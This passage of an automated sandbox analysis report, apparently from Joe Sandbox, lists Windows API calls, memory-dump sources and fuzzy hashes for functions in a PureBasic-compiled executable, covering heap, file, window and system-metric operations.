                                        • Opcode Fuzzy Hash: 495e8d337ab532213a8553dd48cd182140a6b03d5bc003c5ec6fc0d6657f4cde
                                        • Instruction Fuzzy Hash: 19A0023194924056DD4077729A0BB0D3570678174AF1044E9B105751D24974982285AB

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00403DC0: RtlAllocateHeap.NTDLL(02460000,00000008,00000000), ref: 00403DD1
                                          • Part of subcall function 00405EB2: GetTempPathA.KERNEL32(00000104,00000000,00000104,004013B3,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 00405EC9
                                          • Part of subcall function 00405EB2: LoadLibraryA.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013B3,OPS,00000000), ref: 00405ED6
                                          • Part of subcall function 00405EB2: GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405EE8
                                          • Part of subcall function 00405EB2: GetLongPathNameA.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013B3), ref: 00405EF5
                                          • Part of subcall function 00405EB2: FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401BFC,00000000,00000000,00000400,00000000,00000000,00000000,00000000,004013B3,OPS,00000000), ref: 00405EFA
                                        • GetTempFileNameA.KERNEL32(?,0040A00D,00000000,?,00000000,00000400,00000000,00000000,00000000,00000000,004013B3,OPS,00000000,00000000,00000000), ref: 00401C17
                                          • Part of subcall function 00403E50: memcpy.MSVCRT(00000000,00000000,00000000,00000000,004013B3,?,?,00000000,00401C2C,00000000,00000000,00000000,?,0040A00D,00000000), ref: 00403E83
                                          • Part of subcall function 00403E30: HeapFree.KERNEL32(02460000,00000000,00000000,00401113,00000000,00000000), ref: 00403E3E
                                          • Part of subcall function 00405F13: strncpy.MSVCRT ref: 00405F31
                                          • Part of subcall function 00405F13: strlen.MSVCRT ref: 00405F41
                                          • Part of subcall function 00405F13: CreateDirectoryA.KERNELBASE(?,00000000), ref: 00405F7E
                                          • Part of subcall function 00405DD5: GetCurrentDirectoryA.KERNEL32(00000104,00000000,00000104,?,?,?,00000000,00401C62,00000000,00000000,00000000,00000000,?,0040A00D,00000000), ref: 00405DEB
                                          • Part of subcall function 004074F0: strlen.MSVCRT ref: 00407503
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: DirectoryFreeHeapLibraryNamePathTempstrlen$AddressAllocateCreateCurrentFileLoadLongProcmemcpystrncpy
                                        • String ID:
                                        • API String ID: 4243183096-0
                                        • Opcode ID: e56fc6d042597ed60c71002540d3f59920f66fb00b94b04854ac603c610c8ac9
                                        • Instruction ID: 2dff8fe517095d79ad9ad3ab911cbcc41af86ea3352296ed8cd7210842124807
                                        • Opcode Fuzzy Hash: e56fc6d042597ed60c71002540d3f59920f66fb00b94b04854ac603c610c8ac9
                                        • Instruction Fuzzy Hash: 823143701182009FD300FF65ED92E6B7BA9EB48305F10883EF581B61A7C73DA9519B9E
                                        APIs
                                        • RtlReAllocateHeap.NTDLL(00A30000,00000001,00A30700,000040FF), ref: 00407797
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: ad516d237c7ed583f5a18e8cc45da5cf0098420d861495854ab8e72574222f80
                                        • Instruction ID: 28936eabe9b6fdea5660807dec5754b311fbf5a963c992916f66545fa0493ef0
                                        • Opcode Fuzzy Hash: ad516d237c7ed583f5a18e8cc45da5cf0098420d861495854ab8e72574222f80
                                        • Instruction Fuzzy Hash: F301C975900208EFC708CF58EE95A597BB4FB88308B108179ED09A7356D730AA60CB9E
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,-00000018,00000401), ref: 004030B5
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: c50f247240b101207fbf137a822fb79612e5a8787f048ed9cf008535fc236835
                                        • Instruction ID: 460cff1aebd5c89f6a466e3c7b53c8f2e2deecb765fd07c7d01cf3f68e72b86a
                                        • Opcode Fuzzy Hash: c50f247240b101207fbf137a822fb79612e5a8787f048ed9cf008535fc236835
                                        • Instruction Fuzzy Hash: 91F0BCB1604701AFC308CF05C940A0BFBE6EFC8311F15C96AE4989B36AE775D842CB91
                                        APIs
                                        • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,004063E4,00000000,?,?,?,00406298,00000000,?,?), ref: 00405FB5
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: 9e1269481919ece40f11f9664006c58e9186f5c3eb2b0b7e7684ec6c99c078cf
                                        • Instruction ID: 772ef9aa7f968d4b686b07dbd3a32be2510b3ef25a50012a320cac0da8777639
                                        • Opcode Fuzzy Hash: 9e1269481919ece40f11f9664006c58e9186f5c3eb2b0b7e7684ec6c99c078cf
                                        • Instruction Fuzzy Hash: DAE0AEB6515701AFC324CF68C948C67F7F8EB88610B00C92EA89A93A00E630F840CF61
                                        APIs
                                        • HeapCreate.KERNELBASE(00000000,00000400,00000000,0040104E,00000000,00001000,00000000,00000000), ref: 00406810
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: CreateHeap
                                        • String ID:
                                        • API String ID: 10892065-0
                                        • Opcode ID: 063c42fd6fab85bc4f4261230f849ee297642026c7fe5834627ea444ddde3dc4
                                        • Instruction ID: a1970917e828b1c725cfc33b77b9c06a1eec18c1769a3480f2e18b6e12359080
                                        • Opcode Fuzzy Hash: 063c42fd6fab85bc4f4261230f849ee297642026c7fe5834627ea444ddde3dc4
                                        • Instruction Fuzzy Hash: FDB011B0280300ABE2200F20AE0AB003A20B300B0AF200020F300B82E0CBB020208A0E
                                        APIs
                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000,00401062,00000000,00001000,00000000,00000000), ref: 00403D99
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: CreateHeap
                                        • String ID:
                                        • API String ID: 10892065-0
                                        • Opcode ID: c5d78ee7b42623dead5e1ede4b7128ed54204e39d83815b4aeb2356500d143c9
                                        • Instruction ID: eae18f8d58a2e4a3b1d5f4302a4f812a2dd08b0a1b01d317368b01850db83572
                                        • Opcode Fuzzy Hash: c5d78ee7b42623dead5e1ede4b7128ed54204e39d83815b4aeb2356500d143c9
                                        • Instruction Fuzzy Hash: EDB0127029134056E2100F105E06B003930A304B43F100020F340792D6C7F01040450D
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: State$Focus$ClassMessageNamePropSendstrncmp
                                        • String ID: PB_WindowID$Rich
                                        • API String ID: 2735883691-1396934994
                                        • Opcode ID: 34c255d9ab48507f7e4b971ca8b4d3a228d5c90effd43254bb39ffe307da5d8e
                                        • Instruction ID: 77dc2629d62e80cb4dd25d6b8617fe52c6faf744ad0dfdb0d38b69dd5d3036f9
                                        • Opcode Fuzzy Hash: 34c255d9ab48507f7e4b971ca8b4d3a228d5c90effd43254bb39ffe307da5d8e
                                        • Instruction Fuzzy Hash: 940125715007286AEE006BA0DD09FAB2F6CEF10744F008037B901F70D6D679A855DAA9
                                        APIs
                                        • GetWindowLongA.USER32(?,000000F4), ref: 0040471F
                                        • CallWindowProcA.USER32(?,?,?,?,?), ref: 00404748
                                        • RemovePropA.USER32(?,PB_ID), ref: 00404773
                                        • RemovePropA.USER32(?,PB_DropAccept), ref: 0040477B
                                        • RevokeDragDrop.OLE32(?), ref: 00404782
                                        • SetWindowLongA.USER32(?,000000F4,000000FF), ref: 0040478D
                                        • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 004047AF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Window$LongPropRemove$CallDragDropNtdllProcProc_Revoke
                                        • String ID: PB_DropAccept$PB_ID
                                        • API String ID: 1182866496-3688647018
                                        • Opcode ID: b9bfcae031c6630c6e9c092a5eb06929bf36462863c6b1a7c9fcfbf9c6ef34c6
                                        • Instruction ID: 8847c1e44ce66a7f40964fadd5f5e1718d5aefc3fa063d13d1fd232dc2879c57
                                        • Opcode Fuzzy Hash: b9bfcae031c6630c6e9c092a5eb06929bf36462863c6b1a7c9fcfbf9c6ef34c6
                                        • Instruction Fuzzy Hash: C3118231000205BFCB02AF65DD88D6F3BB9EB867747108236F925722E1C735DC219B6A
                                        APIs
                                        • sprintf.MSVCRT ref: 00407E31
                                        • GetPropA.USER32(?,?), ref: 00407E40
                                        • HeapFree.KERNEL32(00000000,?), ref: 00407E95
                                        • HeapFree.KERNEL32(00000000,00000000), ref: 00407E9F
                                        • RemovePropA.USER32(?,?), ref: 00407EA8
                                        • CallWindowProcA.USER32(?,?,00000082,?,?), ref: 00407EC3
                                        • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00407ED7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: FreeHeapPropWindow$CallNtdllProcProc_Removesprintf
                                        • String ID: PB_GadgetStack_%i
                                        • API String ID: 1062891511-1190326050
                                        • Opcode ID: 97b61449fdd32c1f0e1f8b47389faaa8a6c1ca6a220e715a3d7318b1351bfbad
                                        • Instruction ID: cf438cc818e644c30d8d6d7832dcf279f56c8c30dc3acf8a1c3538aaa767c57c
                                        • Opcode Fuzzy Hash: 97b61449fdd32c1f0e1f8b47389faaa8a6c1ca6a220e715a3d7318b1351bfbad
                                        • Instruction Fuzzy Hash: 2E21397290020AFFCF119F50ED44CAA7B7AFB54344B00807AF905A6270D735AD61EB9A
                                        APIs
                                          • Part of subcall function 004056EF: GetPropA.USER32(?,PB_WindowID), ref: 00405736
                                          • Part of subcall function 004056EF: GetParent.USER32(?), ref: 00405746
                                        • GetPropA.USER32(?,PB_MDI_Gadget), ref: 00405B47
                                        • DefFrameProcA.USER32(?,00000000,?,?,?), ref: 00405B88
                                        • SetLastError.KERNEL32(00000000), ref: 00405B92
                                        • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00405BA8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Prop$ErrorFrameLastNtdllParentProcProc_Window
                                        • String ID: PB_MDI_Gadget
                                        • API String ID: 1329112550-983833826
                                        • Opcode ID: a920dc6d61c317e893ad275446e30ae2ed6098b98c1468e5617982f14b082a6e
                                        • Instruction ID: ade2ebb50fd92f58ae0ad3d0689d10ea9bcfa41fb33ca2ed9d154264829cb94a
                                        • Opcode Fuzzy Hash: a920dc6d61c317e893ad275446e30ae2ed6098b98c1468e5617982f14b082a6e
                                        • Instruction Fuzzy Hash: 8F111872901619AFDB209E449D88EBF7A7CEB45751F010037F915B22818778BC61DAAA
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(0;@,00401302,00000000), ref: 00403BAC
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,00401302,00000000), ref: 00403BC0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID: 0;@$0;@
                                        • API String ID: 3192549508-1108649562
                                        • Opcode ID: 17e2f879ba2802d5228fc4bc7392b6e56146e86dabbf6e7f46aef808ca8da191
                                        • Instruction ID: 0d807a84263d1bb0884b5e8a86140cc1ab27614e37fc76056ab1af4718f505d2
                                        • Opcode Fuzzy Hash: 17e2f879ba2802d5228fc4bc7392b6e56146e86dabbf6e7f46aef808ca8da191
                                        • Instruction Fuzzy Hash: BFF0C9B4504300DBC701CF54DA6CA067BF8FB48746F00C53AE905A7261C778D910DB5E
                                        APIs
                                        • GetVersionExA.KERNEL32(?), ref: 00403CF8
                                        • GetVersionExA.KERNEL32(?), ref: 00403D2C
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Version
                                        • String ID:
                                        • API String ID: 1889659487-0
                                        • Opcode ID: 2f668e18bf534e839adff29b041a0c57d0d6119f9984ad761304b36825eead9b
                                        • Instruction ID: 64dd58ad121c3308c00289ce2c9b9cfa90ada999bc39041fec26db6c1a637471
                                        • Opcode Fuzzy Hash: 2f668e18bf534e839adff29b041a0c57d0d6119f9984ad761304b36825eead9b
                                        • Instruction Fuzzy Hash: 47117231644A0A95EF309E689845FAF7EACAF00743F140037A201B53D4E67C8B86C66F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: -
                                        • API String ID: 0-2547889144
                                        • Opcode ID: 88b241b76bfaf1e5bd9491961cd99152fc126292505aae8cd983aa4a9e870cbc
                                        • Instruction ID: 6ce90ec67530ff9c4a70fbf26a1c56785b858b8d4a11dc38e6bfc55cf4a1fc9d
                                        • Opcode Fuzzy Hash: 88b241b76bfaf1e5bd9491961cd99152fc126292505aae8cd983aa4a9e870cbc
                                        • Instruction Fuzzy Hash: 3E52DD75A002199BDF28EFA2D891BFE7BF5EF50304F10042BE45197291FB399A45CB4A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID: -
                                        • API String ID: 0-2547889144
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID: &A
                                        • API String ID: 0-640968382
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,00401BC3,00401BA9,00000001,00000010,OPS,00000000,00000000,00000000), ref: 00403CC6
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID: =
                                        • API String ID: 0-2322244508
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID: =
                                        • API String ID: 0-2322244508
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        APIs
                                        • SystemParametersInfoA.USER32(00000026,00000000,?,00000000), ref: 00405290
                                        • GetWindowRect.USER32(?,00000010), ref: 004052B8
                                        • GetWindowRect.USER32(?,00000020), ref: 004052C1
                                        • GetSystemMetrics.USER32(0000003D), ref: 004052D1
                                        • GetSystemMetrics.USER32(0000003E), ref: 004052D8
                                        • GetWindowLongA.USER32(?,000000F0), ref: 004052E2
                                        • GetSystemMetrics.USER32(00000005), ref: 004052F1
                                        • GetWindowLongA.USER32(?,000000EC), ref: 004052FC
                                        • GetSystemMetrics.USER32(0000002D), ref: 0040530A
                                        • GetSystemMetrics.USER32(0000002E), ref: 00405311
                                        • GetSystemMetrics.USER32(00000022), ref: 00405320
                                        • GetSystemMetrics.USER32(00000023), ref: 00405327
                                        • GetSystemMetrics.USER32(0000003B), ref: 0040532E
                                        • GetSystemMetrics.USER32(0000003C), ref: 00405335
                                        • SendMessageA.USER32(?,00000024,00000000,00000034), ref: 0040534A
                                        • GetKeyState.USER32(00000001), ref: 0040534E
                                        • SendMessageA.USER32(?,00000201,00000001,00000000), ref: 00405364
                                        • SetCapture.USER32(?), ref: 00405369
                                        • PostMessageA.USER32(?,00000231,00000000,00000000), ref: 00405379
                                        • GetCursorPos.USER32(-00000008), ref: 0040538F
                                        • LoadImageA.USER32(00000000,00007F86,00000002,00000000,00000000,00008040), ref: 004053A4
                                        • SetCursor.USER32(00000000), ref: 004053AB
                                        • MapWindowPoints.USER32(?,00000000,?,00000001), ref: 004053E7
                                        • SendMessageA.USER32(?,00000214,?,00000010), ref: 0040540A
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: System$Metrics$Window$Message$Send$CursorLongRect$CaptureImageInfoLoadParametersPointsPostState
                                        • String ID:
                                        • API String ID: 985555588-0
                                        APIs
                                        • sprintf.MSVCRT ref: 00404B46
                                        • memset.MSVCRT ref: 00404B63
                                        • RegisterClassA.USER32(?), ref: 00404BA8
                                        • AdjustWindowRect.USER32(?,00000010,00000000), ref: 00404C01
                                        • GetSystemMetrics.USER32(00000000), ref: 00404C3E
                                        • GetSystemMetrics.USER32(00000001), ref: 00404C58
                                        • GetActiveWindow.USER32 ref: 00404C7F
                                        • GetWindowRect.USER32(?,?), ref: 00404C8E
                                        • CreateWindowExA.USER32(00000000,?,?,00000010,?,?,00000001,?,?,00000000,00000000), ref: 00404CEF
                                        • SetPropA.USER32(00000000,PB_WindowID,00000100), ref: 00404D0C
                                        • ShowWindow.USER32(00000000,00000001), ref: 00404D33
                                        • RtlAllocateHeap.NTDLL(00000000,0000000C), ref: 00404D58
                                        • CreateAcceleratorTableA.USER32(?,?), ref: 00404D95
                                        • UnregisterClassA.USER32(?), ref: 00404DC9
                                          • Part of subcall function 004066BB: memset.MSVCRT ref: 004066D8
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Window$ClassCreateMetricsRectSystemmemset$AcceleratorActiveAdjustAllocateHeapPropRegisterShowTableUnregistersprintf
                                        • String ID: PB_WindowID$WindowClass_%d
                                        • API String ID: 1820370190-2937193648
                                        • Opcode ID: 063ace8527f72d1ec566d245578ff32e7f27e017082b94de6c0a8473836dc150
                                        • Instruction ID: 28adbf0df4d083847e84d8171d787dae0ee48a8b621b34b8ec1d13c8ba578f25
                                        • Opcode Fuzzy Hash: 063ace8527f72d1ec566d245578ff32e7f27e017082b94de6c0a8473836dc150
                                        • Instruction Fuzzy Hash: 3CA17AB190020ADFDB10CF69D989B9EBBF4FF44344F14862AF954A32A0D778D950CB99
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 00403718
                                        • memset.MSVCRT ref: 00403725
                                        • LoadLibraryA.KERNEL32(SHELL32.DLL), ref: 00403732
                                        • strncpy.MSVCRT ref: 00403763
                                        • strlen.MSVCRT ref: 00403772
